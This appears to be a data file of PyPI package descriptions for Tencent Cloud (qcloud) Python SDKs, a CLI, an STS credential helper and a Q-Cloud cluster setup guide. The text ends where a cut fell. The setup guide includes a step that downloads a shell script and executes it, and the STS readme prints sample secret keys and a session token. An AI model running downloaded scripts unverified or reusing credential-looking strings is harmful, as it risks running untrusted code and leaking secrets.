"qcloudapi3\u662f\u4e3a\u4e86\u8ba9Python3\u5f00\u53d1\u8005\u80fd\u591f\u5728\u81ea\u5df1\u7684\u4ee3\u7801\u91cc\u66f4\u5feb\u6377\u65b9\u4fbf\u7684\u4f7f\u7528\u817e\u8baf\u4e91\u7684API\u800c\u5f00\u53d1\u7684Python\u5e93\u3002Example>>> from qcloudapi3 import QcloudApi\n>>> _module = 'wenzhi'\n>>> action = 'TextSentiment'\n>>> config = {\n>>> 'Region': 'gz',\n>>> 'secretId': '123',\n>>> 'secretKey': '000',\n>>> 'method': 'post'\n>>> }\n>>> params = {\n>>> \"content\": \"\u6240\u6709\u4eba\u90fd\u5f88\u5dee\u52b2\u3002\",\n>>> }\n>>> service = QcloudApi(_module, config)\n>>> print('URL:\\n' + service.generateUrl(action, params))\n>>> print(service.call(action, params))\nURL:\nhttps://wenzhi.api.qcloud.com/v2/index.php\n{\"code\":0,\"message\":\"\",\"codeDesc\":\"Success\",\"positive\":0.048611093312502,\"negative\":0.95138889551163}Installpip install qcloudapi3AuthorYixian Du"} +{"package": "qcloudapi-sdk-python", "pacakge-description": "Qcloud Python SDK is the official software development kit, which allows Python developers to write software that makes use of qcloud services like CVM and CBS.The SDK works on Python versions:2.7 and greater, including 3.x.xQuick StartFirst, install the library:$pipinstallqcloudapi-sdk-pythonor download source code from github and install:$gitclonehttps://github.com/QcloudApi/qcloudapi-sdk-python.git$cdqcloudapi-sdk-python$pythonsetup.pyinstallThen, from a Python interpreter or script:>>>fromQcloudApi.qcloudapiimportQcloudApi>>>module='cvm'>>>action='DescribeInstances'>>>config={'Region':'ap-guangzhou','secretId':'xxxx','secretKey':'xxxx','Version':'2017-03-20'}>>>params={'Limit':1}>>>service=QcloudApi(module,config)>>>service.call(action,params)"} +{"package": "qcloud_ccs", "pacakge-description": "No description available on PyPI."} +{"package": "qcloudcli", "pacakge-description": "Tencent Cloud (aka QCloud) Command Line Interface qcloudcli is an open source tool built on top of the Tencent Cloud API that provides commands for interacting with Tencent Cloud services.It works on Python versions:2.7.x and greater3.6.x and greaterInstallThe recommended way to install qcloudcli is to usepip:$pipinstall--userqcloudcli--useroption will install qcloudcli to current user path instead of system path, for Linux system, it might be~/.local, which means it doesn\u2019t requiresudopriviledge.Attention!If you are in avirtualenvenvironment, the--useroption should be removed.Get the version of qcloudcli:$qcloudcli--versionto upgrade:$pipinstall--user--upgradeqcloudclito remove:$pipuninstall--yesqcloudcliCommand CompletionOn Unix-like systems, the qcloudcli includes a command-completion feature that enables you to use the TAB key to complete a partially typed command. This feature is not automatically installed, so you need to configure it manually.$complete-Cqcloud_completerqcloudcliAdd it to your~/.bashrcto enable it by default.Usage GuideConfigurationqcloudcli needs account information to interact with Tencent Cloud Services. Log in Tencent CloudConsole, shift toAPI Credential Managementpage to view your credentials, if the list is empty, you will need to create a new one.SecretIdis used like your account name,SecretKeyis used like your password, so keep in mind that never leak yourSecretKeyto others.Attention!You might not be able to have such page in international site or translations in English version for now.Runqcloudcli congifureto enter interactive mode and provide information like this:$qcloudcliconfigureQcloudAPISecretId[None]:fooQcloudAPISecretKey[None]:barRegionId(gz,hk,ca,sh,shjr,bj,sg)[None]:gzOutputFormat(json,table,text)[None]:jsonThese information will be stored in files under your home root path, for example, in Linux system, it will be~/.qcloudcli/configureand~/.qcloudcli/credentials.The content of~/.qcloudcli/configurein last example is:[default]\noutput = json\nregion = gzThe content of~/.qcloudcli/credentialsin last example is:[default]\nqcloud_secretkey = bar\nqcloud_secretid = forAttention!These information will be stored as plain text, it relies on your correct access control of your private home directory.In Linux system, the default priviledge is:$ ls -l ~/.qcloudcli/\ntotal 8\n4 -rw-rw-r-- 1 john john 36 Nov 29 23:35 configure\n4 -rw------- 1 john john 55 Nov 29 23:35 credentialsAttention!Currently, these two configure files will not be removed when you uninstall qcloudcli, you will need to manually remove them.Use HelpTo get available module list, includingconfigurecommand, run:$ qcloudcli helpTo get action list of specific module, for example, cvm (Cloud Virtual Machine), run:$ qcloudcli cvm helpTo get parameter list of specific action, for example, DescribeInstances, run:$ qcloudcli cvm DescribeInstances helpSpecify Complex Object ParamtersTo specify base type parameters, like string and int, you can directly use it. For example, to get instance (virtual machine) list, use default API version, limit the return item to 10, run:$ qcloudcli cvm DescribeInstances --limit 10For complex object parameters, like array and dictionary, you have to use json format string.For example, to get instance list, use default API version, only query instances which id areqcvmf4b542ad7b4cd49f2db57a733368d5b1andqcvmaf636dd06a816765b4f2c51595f2d84d, run:$ qcloudcli cvm DescribeInstances --instanceIds '[\"qcvmf4b542ad7b4cd49f2db57a733368d5b1\", \"qcvmaf636dd06a816765b4f2c51595f2d84d\"]'For example, to get instance list, use API version 2017-03-12, withFiltersparameter, only return instances in ap-guangzhou-2 zone, run:$ qcloudcli cvm DescribeInstances --Filters '[{\"Name\":\"zone\",\"Values\":[\"ap-guangzhou-2\"]}]'For example, to create new instances, use API version 2017-03-12, a complex example might be:$ qcloudcli cvm RunInstances --Placement '{\"Zone\":\"ap-beijing-3\"}' --InstanceChargeType PREPAID --InstanceChargePrepaid '{\"Period\":1,\"RenewFlag\":\"NOTIFY_AND_AUTO_RENEW\"}' --ImageId img-dkwyg6sr --InstanceType S2.SMALL1 --SystemDisk '{\"DiskType\":\"CLOUD_BASIC\",\"DiskSize\":50}' --InternetAccessible '{\"InternetChargeType\":\"TRAFFIC_POSTPAID_BY_HOUR\",\"InternetMaxBandwidthOut\":2,\"PublicIpAssigned\":\"TRUE\"}' --InstanceName prod-jumpserver-01 --EnhancedService '{\"SecurityService\":{\"Enabled\":\"TRUE\"},\"MonitorService\":{\"Enabled\":\"TRUE\"}}' --InstanceCount 1 --VirtualPrivateCloud '{\"VpcId\":\"vpc-njkwg482\",\"SubnetId\":\"subnet-6rs8ienn\"}'NOTE: HerePlacementhas specify availability zone to beap-beijing-3, so the region value in~/.qcloudcli/configuremust bebj, or you can specify global parameter--RegionIdap-beijingto override configured value.Filter Dataqcloudcli provides--filteroption which bases onjmespathto filter returned data, it is pretty useful when you want to get specific data from a bunch of items. However, you need to know the exact structure of returned json format.For example, to get security groups and only return security gourp id, run:$ qcloudcli dfw DescribeSecurityGroups --filter data[*].sgId\n[\n \"sg-icy671l9\",\n \"sg-o9rfv42p\",\n \"sg-pknfyaar\",\n \"sg-2rjokpt7\",\n \"sg-4ehjaoh3\"\n]*means get all elements.For example, using CVM API version 2017-03-12, to get security groups id of a specific instance ins-od1laqxs, run:$ qcloudcli cvm DescribeInstances --InstanceIds '[\"ins-od1laqxs\"]' --filter Response.InstanceSet[0].SecurityGroupIds\n[\n \"sg-4ehjaoh3\"\n]The index0means get the first instance.Specify API VersionNOTE: New in version 1.9.0Some services of Tencent Cloud have multiple API versions, for example, CVM has a API version 2017-03-12, to use it, open~/.qcloudcli/configureand add the following content in profile section:api_versions =\n cvm = 2017-03-12If the specified version doesn\u2019t exist, you will get an error when you run related commands.\nIf the service only has one version, then you don\u2019t need to add such configuration, please remove it.\nIf the service has multiple versions, and there is no such configuration, then the default one will be used.Use HTTPS ProxyNOTE: New in version 1.8.9If you are in an environment behinds a proxy, and*.api.qcloud.comis not in the proxy white list, then you will need to configure HTTPS proxy to get qcloudcli work.Currently, only verified in Linux and Windows system, with proxy doesn\u2019t require user name and password.In Linux system, to set your temporary global proxy, run:$ export https_proxy=YourProxyRealHost:YourProxyRealPortPlease note that replaceYourProxyRealHostandYourProxyRealPortwith your real proxy information.\nYou can add it to your~/.bashrcto active it by default.In Windows system, to set your temporary global proxy, run:> set https_proxy=YourProxyRealHost:YourProxyRealPortYou can add it to your system environment variables to active it by default."} +{"package": "qcloud-cmq-sdk", "pacakge-description": "No description available on PyPI."} +{"package": "qcloud-cmq-sdk-py3", "pacakge-description": "No description available on PyPI."} +{"package": "qcloud_cos", "pacakge-description": "UNKNOWN"} +{"package": "qcloud_cos_py3", "pacakge-description": "version: 0.1.4OverviewA 3rd-party SDK for Qcloud COS and Python 3Installation / UsageDocs:https://su27.github.io/qcloud_cos_py3/Use pip to install:$ pip install qcloud_cos_py3Or clone the repo:$ git clonehttps://github.com/su27/qcloud_cos_py3.git$ python setup.py installContributing$ virtualenv -p python3.6 venv\n$ source venv/bin/activate\n$ pip install -r requirements.txt\n$ cp tests/config_example.py tests/config.py# Fill the blanks in the file and run\n$ make test-coverageIt\u2019s originally forked from [cos-python3-sdk](https://github.com/imu-hupeng/cos-python3-sdk)ExamplePlease checktests/test_cos.py"} +{"package": "qcloud-cos-python3", "pacakge-description": "No description available on PyPI."} +{"package": "qcloud_cos_v3", "pacakge-description": "UNKNOWN"} +{"package": "qcloud_cos_v4", "pacakge-description": "\u4ecb\u7ecd\u817e\u8baf\u4e91COSv4\u7684Python SDK, \u76ee\u524d\u53ef\u4ee5\u652f\u6301Python2.6\u4e0ePython2.7\u3002\u5b89\u88c5\u6307\u5357\u4f7f\u7528pip\u5b89\u88c5pip install -U qcloud_cos_v4\u624b\u52a8\u5b89\u88c5:python setup.py install\u4f7f\u7528\u65b9\u6cd5\u4f7f\u7528python sdk\uff0c\u53c2\u7167sample.py# \u8bbe\u7f6e\u7528\u6237\u5c5e\u6027, \u5305\u62ecappid, secret_id\u548csecret_key# \u8fd9\u4e9b\u5c5e\u6027\u53ef\u4ee5\u5728cos\u63a7\u5236\u53f0\u83b7\u53d6(https://console.qcloud.com/cos)appid=100000# \u66ff\u6362\u4e3a\u7528\u6237\u7684appidsecret_id=u'xxxxxxxx'# \u66ff\u6362\u4e3a\u7528\u6237\u7684secret_idsecret_key=u'xxxxxxx'# \u66ff\u6362\u4e3a\u7528\u6237\u7684secret_keyregion_info=\"sh\"# \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 # \u66ff\u6362\u4e3a\u7528\u6237\u7684region\uff0c\u76ee\u524d\u53ef\u4ee5\u4e3a sh/gz/tj/sgp\uff0c\u5206\u522b\u5bf9\u5e94\u4e8e\u4e0a\u6d77\uff0c\u5e7f\u5dde\uff0c\u5929\u6d25,\u65b0\u52a0\u5761\u56ed\u533acos_client=CosClient(appid,secret_id,secret_key,region=region_info)# \u8bbe\u7f6e\u8981\u64cd\u4f5c\u7684bucketbucket=u'mybucket'############################################################################# \u6587\u4ef6\u64cd\u4f5c ############################################################################## 1. \u4e0a\u4f20\u6587\u4ef6(\u9ed8\u8ba4\u4e0d\u8986\u76d6)# \u5c06\u672c\u5730\u7684local_file_1.txt\u4e0a\u4f20\u5230bucket\u7684\u6839\u5206\u533a\u4e0b,\u5e76\u547d\u540d\u4e3asample_file.txt# \u9ed8\u8ba4\u4e0d\u8986\u76d6, \u5982\u679ccos\u4e0a\u6587\u4ef6\u5b58\u5728,\u5219\u4f1a\u8fd4\u56de\u9519\u8befrequest=UploadFileRequest(bucket,u'/sample_file.txt',u'local_file_1.txt')upload_file_ret=cos_client.upload_file(request)print'upload file ret:',repr(upload_file_ret)# 2. \u4e0a\u4f20\u6587\u4ef6(\u8986\u76d6\u6587\u4ef6)# 2.1\u4e0a\u4f20\u672c\u5730\u6587\u4ef6\uff0c\u5c06\u672c\u5730\u7684local_file_2.txt\u4e0a\u4f20\u5230bucket\u7684\u6839\u5206\u533a\u4e0b,\u8986\u76d6\u5df2\u4e0a\u4f20\u7684sample_file.txtrequest=UploadFileRequest(bucket,u'/sample_file.txt',u'local_file_2.txt')request.set_insert_only(0)# \u8bbe\u7f6e\u5141\u8bb8\u8986\u76d6upload_file_ret=cos_client.upload_file(request)print'overwrite file ret:',repr(upload_file_ret)# 2.2\u4ece\u5185\u5b58\u4e0a\u4f20\u6587\u4ef6request=UploadFileFromBufferRequest(bucket,u'/sample_file.txt',data)request.set_insert_only(0)# \u8bbe\u7f6e\u5141\u8bb8\u8986\u76d6upload_file_ret=cos_client.upload_file_from_buffer(request)print'overwrite file ret:',repr(upload_file_ret)# 3. \u83b7\u53d6\u6587\u4ef6\u5c5e\u6027request=StatFileRequest(bucket,u'/sample_file.txt')stat_file_ret=cos_client.stat_file(request)print'stat file ret:',repr(stat_file_ret)# 4. \u66f4\u65b0\u6587\u4ef6\u5c5e\u6027request=UpdateFileRequest(bucket,u'/sample_file.txt')request.set_biz_attr(u'this is demo file')# \u8bbe\u7f6e\u6587\u4ef6biz_attr\u5c5e\u6027,\u4e0d\u652f\u6301\u4e2d\u6587request.set_authority(u'eWRPrivate')# \u8bbe\u7f6e\u6587\u4ef6\u7684\u6743\u9650request.set_cache_control(u'cache_xxx')# \u8bbe\u7f6eCache-Controlrequest.set_content_type(u'application/text')# \u8bbe\u7f6eContent-Typerequest.set_content_disposition(u'ccccxxx.txt')# \u8bbe\u7f6eContent-Dispositionrequest.set_content_language(u'english')# \u8bbe\u7f6eContent-Languagerequest.set_x_cos_meta(u'x-cos-meta-xxx',u'xxx')# \u8bbe\u7f6e\u81ea\u5b9a\u4e49\u7684x-cos-meta-\u5c5e\u6027request.set_x_cos_meta(u'x-cos-meta-yyy',u'yyy')# \u8bbe\u7f6e\u81ea\u5b9a\u4e49\u7684x-cos-meta-\u5c5e\u6027update_file_ret=cos_client.update_file(request)print'update file ret:',repr(update_file_ret)# 5. \u66f4\u65b0\u540e\u518d\u6b21\u83b7\u53d6\u6587\u4ef6\u5c5e\u6027request=StatFileRequest(bucket,u'/sample_file.txt')stat_file_ret=cos_client.stat_file(request)print'stat file ret:',repr(stat_file_ret)# 6. \u79fb\u52a8\u6587\u4ef6, \u5c06sample_file.txt\u79fb\u52a8\u4f4dsample_file_move.txtrequest=MoveFileRequest(bucket,u'/sample_file.txt',u'/sample_file_move.txt')stat_file_ret=cos_client.move_file(request)print'move file ret:',repr(stat_file_ret)# 7. \u5220\u9664\u6587\u4ef6request=DelFileRequest(bucket,u'/sample_file_move.txt')del_ret=cos_client.del_file(request)print'del file ret:',repr(del_ret)# 8. \u4e0b\u8f7d\u6587\u4ef6request=DownloadFileRequest(bucket,u'/sample_file_move.txt')del_ret=cos_client.download_file(request)print'del file ret:',repr(del_ret)# 9. \u4e0b\u8f7d\u6587\u4ef6\u5230\u5185\u5b58request=DownloadObjectRequest(bucket,u'/sample_file_move.txt')fp=cos_client.download_object(request)fp.read()############################################################################# \u76ee\u5f55\u64cd\u4f5c ############################################################################## 1. \u751f\u6210\u76ee\u5f55, \u76ee\u5f55\u540d\u4e3asample_folderrequest=CreateFolderRequest(bucket,u'/sample_folder/')create_folder_ret=cos_client.create_folder(request)print'create folder ret:',create_folder_ret# 2. \u66f4\u65b0\u76ee\u5f55\u7684biz_attr\u5c5e\u6027request=UpdateFolderRequest(bucket,u'/sample_folder/',u'this is a test folder')# biz_attr\u4e0d\u652f\u6301\u4e2d\u6587update_folder_ret=cos_client.update_folder(request)print'update folder ret:',repr(update_folder_ret)# 3. \u83b7\u53d6\u76ee\u5f55\u5c5e\u6027request=StatFolderRequest(bucket,u'/sample_folder/')stat_folder_ret=cos_client.stat_folder(request)print'stat folder ret:',repr(stat_folder_ret)# 4. list\u76ee\u5f55, \u83b7\u53d6\u76ee\u5f55\u4e0b\u7684\u6210\u5458request=ListFolderRequest(bucket,u'/sample_folder/')list_folder_ret=cos_client.list_folder(request)print'list folder ret:',repr(list_folder_ret)# 5. \u5220\u9664\u76ee\u5f55request=DelFolderRequest(bucket,u'/sample_folder/')delete_folder_ret=cos_client.del_folder(request)print'delete folder ret:',repr(delete_folder_ret)"} +{"package": "qcloud_image", "pacakge-description": "UNKNOWN"} +{"package": "qcloud-python-sts", "pacakge-description": "\u83b7\u53d6 SDKpip install -U qcloud-python-sts\u8c03\u7528\u793a\u4f8b\u8bf7\u67e5\u770bdemo\u91cc\u7684\u793a\u4f8b\u3002\u63a5\u53e3\u8bf4\u660eget_credential\u83b7\u53d6\u4e34\u65f6\u5bc6\u94a5\u63a5\u53e3\u53c2\u6570\u8bf4\u660e\u5b57\u6bb5\u7c7b\u578b\u63cf\u8ff0secret_idString\u4e91 API \u5bc6\u94a5 Idsecret_keyString\u4e91 API \u5bc6\u94a5 keyduration_secondslong\u8981\u7533\u8bf7\u7684\u4e34\u65f6\u5bc6\u94a5\u6700\u957f\u6709\u6548\u65f6\u95f4\uff0c\u5355\u4f4d\u79d2\uff0c\u9ed8\u8ba4 1800\uff0c\u6700\u5927\u53ef\u8bbe\u7f6e 7200bucketString\u5b58\u50a8\u6876\u540d\u79f0\uff1abucketName-appid, \u5982 test-125000000regionString\u5b58\u50a8\u6876\u6240\u5c5e\u5730\u57df\uff0c\u5982 ap-guangzhouallow_prefixlist\u8d44\u6e90\u7684\u524d\u7f00\uff0c\u53ef\u4ee5\u6839\u636e\u81ea\u5df1\u7f51\u7ad9\u7684\u7528\u6237\u767b\u5f55\u6001\u5224\u65ad\u5141\u8bb8\u4e0a\u4f20\u7684\u5177\u4f53\u8def\u5f84\uff0c\u4f8b\u5b50\uff1a a.jpg \u6216\u8005 a/* \u6216\u8005 * (\u4f7f\u7528\u901a\u914d\u7b26*\u5b58\u5728\u91cd\u5927\u5b89\u5168\u98ce\u9669, \u8bf7\u8c28\u614e\u8bc4\u4f30\u4f7f\u7528)allow_actionslist\u6388\u4e88 COS API \u6743\u9650\u96c6\u5408, \u5982\u7b80\u5355\u4e0a\u4f20\u64cd\u4f5c\uff1aname/cos:PutObjectpolicydict\u7b56\u7565\uff1a\u7531 allow_actions\u3001bucket\u3001allow_prefix\u5b57\u6bb5\u7ec4\u6210\u7684\u63cf\u8ff0\u6388\u6743\u7684\u5177\u4f53\u4fe1\u606f\u8fd4\u56de\u503c\u8bf4\u660e\u5b57\u6bb5\u7c7b\u578b\u63cf\u8ff0credentialsdict\u4e34\u65f6\u5bc6\u94a5\u4fe1\u606ftmpSecretIdString\u4e34\u65f6\u5bc6\u94a5 Id\uff0c\u53ef\u7528\u4e8e\u8ba1\u7b97\u7b7e\u540dtmpSecretKeyString\u4e34\u65f6\u5bc6\u94a5 Key\uff0c\u53ef\u7528\u4e8e\u8ba1\u7b97\u7b7e\u540dsessionTokenString\u8bf7\u6c42\u65f6\u9700\u8981\u7528\u7684 token \u5b57\u7b26\u4e32\uff0c\u6700\u7ec8\u8bf7\u6c42 COS API \u65f6\uff0c\u9700\u8981\u653e\u5728 Header \u7684 x-cos-security-token \u5b57\u6bb5startTimeString\u5bc6\u94a5\u7684\u8d77\u59cb\u65f6\u95f4\uff0c\u662f UNIX \u65f6\u95f4\u6233expiredTimeString\u5bc6\u94a5\u7684\u5931\u6548\u65f6\u95f4\uff0c\u662f UNIX \u65f6\u95f4\u6233\u8fd4\u56de\u7ed3\u679c\u6210\u529f\u7684\u8bdd\uff0c\u53ef\u4ee5\u62ff\u5230\u5305\u542b\u5bc6\u94a5\u7684 JSON \u6587\u672c\uff1a{\"credentials\":{\"tmpSecretId\":\"AKIDEPMQB_Q9Jt2fJxXyIekOzKZzx-sdGQgBga4TzsUdTWL9xlvsjInOHhCYFqfoKOY4\",\"tmpSecretKey\":\"W/3Lbl1YEW02mCoawIesl5kNehSskrSbp1cT1tgW70g=\",\"sessionToken\":\"c6xnSYAxyFbX8Y50627y9AA79u6Qfucw6924760b61588b79fea4c277b01ba157UVdr_10Y30bdpYtO8CXedYZe3KKZ_DyzaPiSFfNAcbr2MTfAgwJe-dhYhfyLMkeCqWyTNF-rOdOb0rp4Gto7p4yQAKuIPhQhuDd77gcAyGakC2WXHVd6ZuVaYIXBizZxqIHAf4lPiLHa6SZejSQfa_p5Ip2U1cAdkEionKbrX97xTKTcA_5Pu525CFSzHZIQibc2uNMZ-IRdQp12MaXZB6bxM6nB4xXH45mDIlbIGjaAsrtRJJ3csmf82uBKaJrYQoguAjBepMH91WcH87LlW9Ya3emNfVX7NMRRf64riYd_vomGF0TLgan9smEKAOdtaL94IkLvVJdhLqpvjBjp_4JCdqwlFAixaTzGJHdJzpGWOh0mQ6jDegAWgRYTrJvc5caYTz7Vphl8XoX5wHKKESUn_vqyTAid32t0vNYE034FIelxYT6VXuetYD_mvPfbHVDIXaFt7e_O8hRLkFwrdAIVaUml1mRPvccv2qOWSXs\"},\"expiration\":\"2019-08-07T08:54:35Z\",\"startTime\":1565166275,\"expiredTime\":1565168075}get_policy\u83b7\u53d6\u7b56\u7565(policy)\u63a5\u53e3\u3002\u672c\u63a5\u53e3\u9002\u7528\u4e8e\u63a5\u6536 Web\u3001iOS\u3001Android \u5ba2\u6237\u7aef SDK \u63d0\u4f9b\u7684 Scope \u53c2\u6570\u3002\u63a8\u8350\u60a8\u628a Scope \u53c2\u6570\u653e\u5728\u8bf7\u6c42\u7684 Body \u91cc\u9762\uff0c\u901a\u8fc7 POST \u65b9\u5f0f\u4f20\u5230\u540e\u53f0\u3002\u53c2\u6570\u8bf4\u660e\u5b57\u6bb5\u7c7b\u578b\u63cf\u8ff0bucketString\u5b58\u50a8\u6876\u540d\u79f0\uff1abucketName-appid, \u5982 test-125000000regionString\u5b58\u50a8\u6876\u6240\u5c5e\u5730\u57df\uff0c\u5982 ap-guangzhouresource_prefixString\u8d44\u6e90\u7684\u524d\u7f00\uff0c\u53ef\u4ee5\u6839\u636e\u81ea\u5df1\u7f51\u7ad9\u7684\u7528\u6237\u767b\u5f55\u6001\u5224\u65ad\u5141\u8bb8\u4e0a\u4f20\u7684\u5177\u4f53\u8def\u5f84\uff0c\u4f8b\u5b50\uff1a a.jpg \u6216\u8005 a/* \u6216\u8005 * (\u4f7f\u7528\u901a\u914d\u7b26*\u5b58\u5728\u91cd\u5927\u5b89\u5168\u98ce\u9669, \u8bf7\u8c28\u614e\u8bc4\u4f30\u4f7f\u7528)actionString\u6388\u4e88 COS API \u6743\u9650\uff0c, \u5982\u7b80\u5355\u4e0a\u4f20\u64cd\u4f5c\uff1aname/cos:PutObjectscopeScope\u6784\u9020policy\u7684\u4fe1\u606f\uff1a\u7531 action\u3001bucket\u3001region\u3001sourcePrefix\u7ec4\u6210\u8fd4\u56de\u503c\u8bf4\u660e\u5b57\u6bb5\u7c7b\u578b\u63cf\u8ff0policydict\u7533\u8bf7\u4e34\u65f6\u5bc6\u94a5\u6240\u9700\u7684\u6743\u9650\u7b56\u7565\u8fd4\u56de\u7ed3\u679c{\"version\":\"2.0\",\"statement\":[{\"action\":[\"name/cos:PutObject\"],\"effect\":\"allow\",\"resource\":[\"qcs::cos:ap-guangzhou:uid/1250000000:example-1250000000/1.txt\"]},{\"action\":[\"name/cos:GetObject\"],\"effect\":\"allow\",\"resource\":[\"qcs::cos:ap-guangzhou:uid/1250000000:example-1250000000/dir/exampleobject\"]}]}"} +{"package": "qcloud-python-test", "pacakge-description": "No description available on PyPI."} +{"package": "qcloud-requests-auth", "pacakge-description": "Seehttps://github.com/davendu/qcloud-requests-authfor installation and usage instructions."} +{"package": "qcloud-sdk-py", "pacakge-description": "qcloud-sdk-py\u7b80\u4ecb\u91cf\u6f6e\u79d1\u6280\u51fa\u54c1\u7684\u817e\u8baf\u4e91Python\u670d\u52a1\u7aefSDK\u3002\u5b89\u88c5pip install qcloud-sdk-py\u4f7f\u7528\u5047\u8bbe\u5728\u73af\u5883\u53d8\u91cf\u4e2d\u914d\u7f6eQCLOUDSDK_SECRET_ID\u548cQCLOUDSDK_SECRET_KEY\uff0c\u672a\u914d\u7f6e\u53ef\u4ee5\u901a\u8fc7APIClient\u4f20\u5165\u3002# \u5bfc\u5165\u6a21\u5757fromqcloud_sdk.apiimportQCloudAPIClient# \u521b\u5efaAPIClient\u5b9e\u4f8bclient=QCloudAPIClient()# \u901a\u7528APIclient.request_api(service='cvm',region='ap-shanghai',api='DescribeZones',api_params={})\u6587\u6863\u817e\u8baf\u4e91Python\u670d\u52a1\u7aefSDK\u6587\u6863"} +{"package": "qcloud-setup", "pacakge-description": "Q-Cloud Administrator DocumentationIntroductionQ-Cloud is a framework that allows users to easily launch elastic compute\nclusters on AWS and submit Q-Chem calculations to them. The clusters will\nautomatically expand with demand, up to the maximum size determined by\nthe type of Q-Cloud license purchased, and idle nodes will shut down to\nminimize running costs.Q-Cloud clusters are built around three separate AWS service stacks with the\nfollowing names and purposes:qcloud-users: This stack controls user access to the cluster. It\nlaunches a Cognito service which manages users, passwords and access tokens.qcloud-api-gateway: This stack provides the REST endpoints for submitting jobs to\nthe cluster and for accessing the results from calculations.qcloud-cluster: This is the actual compute cluster and consists of a head node\n(which can be just a t2.micro instance) running a SLURM workload manager.\nThe head node is responsible for launching the compute instances which run\nthe Q-Chem calculations. The head node runs for the lifetime of the\ncluster, but the compute nodes run on-demand and automatically terminate\nwhen there are no jobs in the queue.Note:Charges apply to many AWS services. See the Costs section for\nfurther details and information on how to minimise the running costs of the\ncluster.PrerequisitesThe cluster administrator will need to have a valid AWS account with\nAdmin\nand be able to\nlog into their account via theconsolein\norder to obtain access and secret access keys.Users of the cluster do not require AWS accounts as their access to the\ncluster is configured separately, (see the Adding users section below for\nfurther details on setting up user accounts).The Q-Cloud infrastructure requires you to have python (v3.7 or later)\ninstalled.The following steps are required to set up a Q-Cloud cluster.1) Obtain access keysThis step can be skipped if you have already configured the AWS CLI.Open up the AWSconsolein a browser. Search\nfor IAM and select the first hit. This brings up the IAM dashboard.From the left hand panel select 'Users' and then click on the name of a user\nwith administrator privileges (i.e. the AdministratorAccess permissions\npolicy has been attached). Note this administrator user is only required\nto create the qcloud_admin user with restricted permissions and is not used\nto launch any of the Q-Cloud resources.Select the 'Security credentials' tab and scroll down to the 'Access keys'\nsection and click the 'Create access key' button.Select the 'Command Line Interface CLI' option as the use case, check\nthe confirmation checkbox and click the Next button.Enter a description for the key and click 'Create access key'.Make a note of both the access key and the secret access key. You will not\nhave another opportunity to see the secret key, so if you misplace it you\nwill need to deactivate the key and generate a new one.2) Install the qcloud_setup scriptDownload the install_qcloud.sh script, add executable permissions and run it:wget https://downloads.q-chem.com/install_qcloud.sh\nchmod +x install_qcloud.sh\n./install_qcloud.shThis will create a virtual environment with the required Python packages installed.\nMake a note of the directory created for the virtual environment (this is output\nat the end of the install script). To activate the virtual environment and run\nthe qcloud_setup script, simply type.bash\ncd /path/to/qcloud_venv\nsource env/bin/activate\nqcloud_setup [options]Note the bash line is only required if bash is not your regular shell.\nTo exit the virtual environment after setting up your cluster simply, typedeactivate3) Configure clusterWithin the virtual environment, cluster configuration files can be generated with the command:qcloud_setup --configureThis takes the user through an interactive setup process which produces a\nconfiguration file with the nameqcloud-cluster.configwhich can be viewed\nbefore launching the cluster. Do not modify the contents of the configuration\nfile as it may cause subsequent steps in the setup to fail.By default the name of the cluster is 'qcloud', but this can be changed using\nthe--name option. This allows for multiple clusters to run\nat the same time, if required. Note that if a non-default name is specified\nthen this name must be passed using the--nameoption to subsequent commands\n(e.g.--launch) in order that they operate on the correct cluster.The options specified in the configuration process are discussed in detail below.3.1) AWS CredentialsThese should have been configured previously for the qcloud_admin user and, if\nso, are automatically detected.A new SSH key pair will be created to connect to the head node instance and the\nprivate key will be saved in the qcloud__keypair.pem file. You can\ncopy this key file to the location of your other key files (e.g. the ~/.ssh\ndirectory), if desired. Do not lose this private key as you will be unable to\nconnect to the head node without it.3.2) VPC setupThe Q-Cloud cluster runs inside a Virtual Private Cloud (VPC) and it is\nrecommended that a new VPC be created for running the Q-Cloud cluster.\nHowever, because there is a limit on the number of VPCs per AWS account, this may\nnot be possible for some users. Please select whichever of the following\noptions is best for your case:Default: This option will use your default VPC and both the head node and\ncompute clusters will be in a public subnet (not recommended).Use existing: If available. The setup script will look for a previously\nconfigured Q-Cloud VPC. This will have both public (for the head node)\nand private (compute nodes) subnets configured.Create new: This will create a new VPC with public and private subnets.The availability zone of the subnets does not matter.3.3) Compute instance typesThe costs shown are indicative only and are for running each instance. They\ndo not include storage or network costs. Note the difference between c5 and\nc5d instance types is the latter uses local NVMe-based SSD block storage which\nis physically connected to the instance and therefore faster.3.4) Maximum compute nodesThis determines the maximum number of compute instances that can run concurrently.\nIf more jobs are submitted than this value, they will be queued until the resources\nbecome available.This value should be set to the same number as the number of seats purchased as\npart of your license.3.5) Job filesThis is the space allocated for the jobs volume which is attached to the head\nnode and shared between compute instances. This volume is used for output\nfiles only and can be quite small. Output files are automatically deleted\nafter they have been copied to the S3 bucket.3.6) Scratch filesThis determines the scratch volume size per instance. As an indicative cost,\n100Gb costs around $10/month.4) Launching the clusterOnce a configuration file has been generated, the service stacks can be\nlaunched with the following:qcloud_setup --launchThe configuration file is automatically updated with values for the place holders\nas the various resources are created.Notes:Some steps in the launch process can take several minutes to complete, in\nparticular building the cluster stack. Migrating the Q-Cloud software to\nyour region can take a variable amount of time depending on network load.If you terminate the the qcloud_setup script during the creation process\nthe stack will continue to be created. Use the--deleteoption to\nactually delete or stop the stack creation.Interrupting the launch process may leave a temporary snapshot lying around.\nTo delete this, log into theAWS consoleand\nnavigate to EC2 \u2192 Snapshots. Any Q-Cloud snapshots can be safely deleted\nas long as you are not currently launching a cluster.Once launched, you will need to send the following information tolicense@q-chem.comto obtain your license activation key:Order numberNameUniversity / InstitutionElastic IP address (provided as output from the launch command)Once you have your activation key, you can install it as follows:qcloud_setup --activation-key XXXX-XXXX-XXXX-XXXX-XXXXThis command requires access to the SSH key generated during the configuration\nstep, which should be either in the current directory or in your home directory\nunder ~/.ssh.Adding usersBefore submitting jobs, a user will need to be added to the Cognito user pool:qcloud_setup --adduser --email Alternatively, you can add multiple users from a file:qcloud_setup --addusers where the file_name consists of a list of user names and email addresses with the\nformat:elmo elmo@gmail.com\nbigbird bigbird@gmail.com\n...A message will be sent to the user's email address with their user name and a\ntemporary password, which will need to be changed when first attempting to\nsubmit a job.Note that the number of users able to be added each day is limited to 50 due to\nemail limits in the Cognito service. If you need to add more than this you\nwill need to configure Cognito with the Simple Email Service' (SES) and add a\nvalidated administrator email.The cluster administrator will need to provide the server details to each\nuser which can be obtained by running the command:qcloud_setup --userinfo\nAwsRegion 